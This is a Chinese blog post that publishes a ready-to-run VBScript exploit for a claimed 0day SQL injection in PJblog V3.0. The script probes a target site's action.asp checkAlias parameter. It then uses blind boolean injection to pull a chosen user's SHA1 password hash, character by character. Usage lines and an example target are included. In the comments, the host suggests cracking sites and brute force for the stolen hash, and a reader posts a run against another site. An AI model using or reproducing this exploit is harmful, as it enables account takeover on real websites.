PJblog V3.0 0day Vbs版漏洞利用工具

来源:WEB安全手册

感谢雨中风铃的投递

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
	Dim Http
	Set Http = CreateObject("msxml2.serverXMLHTTP")
	With Http
		.Open "GET",PostUrl,False
		.Send ()
		PostData = .ResponseBody
	End With
	Set Http = Nothing
	PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
	Dim strReturn
	Dim I, ThisCharCode, NextCharCode
	strReturn = ""
	For I = 1 To LenB(vIn)
		ThisCharCode = AscB(MidB(vIn, I, 1))
		If ThisCharCode < &H80 Then
			strReturn = strReturn & Chr(ThisCharCode)
		Else
			NextCharCode = AscB(MidB(vIn, I + 1, 1))
			strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
			I = I + 1
		End If
	Next
	bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

截图如下:

6fd9e594388c5f3dd31b703c

相关日志

楼被抢了 8 层了... 抢座Rss 2.0或者 Trackback

  • 海天无影

    得到加密过的密码怎么利用啊?

    • 鬼仔

      密码是sha1加密的,可以找些反查的查下试试
      或者暴力破解
      http://passcracking.com/
      http://md5.rednoize.com/
      这两个可以反查的站试下。

      • 土匪VS花姑娘

        我感觉hmac_sha1加密比较好,可以自己定义key,这样好像没有网站能反查出来。
        比如说 111 sha1 加密后是 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 列
        用hmac_sha1自定义加密的是 9c60c2e9eb25001eeea8a579b0f49ed6b9589775 列,那破解的网站是杂都破解不出来了。呵~

  • molutran

    CScript 错误: Windows 脚本宿主执行失败。 (存储空间不足,无法完成此操作。 )

    解决方法:cscript //nologo c:\pjblog.vbs URL地址 用户名

  • nstt

    C:\Documents and Settings\Administrator\桌面>cscript 1.vbs http://www.vdesign.cn
    /blog/ nthesky
    Microsoft (R) Windows Script Host Version 5.7
    版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

    恭喜!存在漏洞
    C:\Documents and Settings\Administrator\桌面\1.vbs(27, 25) Microsoft VBScript 运
    行时错误: 无效的过程调用或参数: ‘Mid’
    ———-
    为什么提示
    C:\Documents and Settings\Administrator\桌面>cscript 1.vbs http://www.vdesign.cn
    /blog/ nthesky
    Microsoft (R) Windows Script Host Version 5.7
    版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

    恭喜!存在漏洞
    C:\Documents and Settings\Administrator\桌面\1.vbs(27, 25) Microsoft VBScript 运
    行时错误: 无效的过程调用或参数: ‘Mid’

    • 雨中风铃

      你的用户名没有复制全,导致在第一轮循环时Mid函数第二个参数为0出现错误。

  • 土匪VS花姑娘

    其实sha1反查要比md5难的多。暴力破解就更不是好办法了。我个人感觉加密还是用sha1的好,我这有一个asp sha1 加密,和asp hex_hmac_sha1加密的程序,一个文件里面代了六种不可逆加密,我感觉那个都比现用md5强,很适用,我发一下演示地址,希望能在鬼仔网站发布源代码。
    演示地址:http://www.virus8.com/sha1

  • Loveyuki

    鬼仔你好,我是 L-BLOG 的开发者 Loveyuki,大家应该记得 L-BLOG 当时的漏洞很多,所以从那以后我就特别注意安全方面的问题。

    Bitrac 是我最近开发的一个 ASP.NET 单用户博客程序,如果鬼仔你有时间的话,希望能研究下是否有漏洞。虽然我是开发人员,但是对漏洞的嗅觉远不如你专业。谢谢。网址留言里面就不写了。留言资料里面写了。

发表评论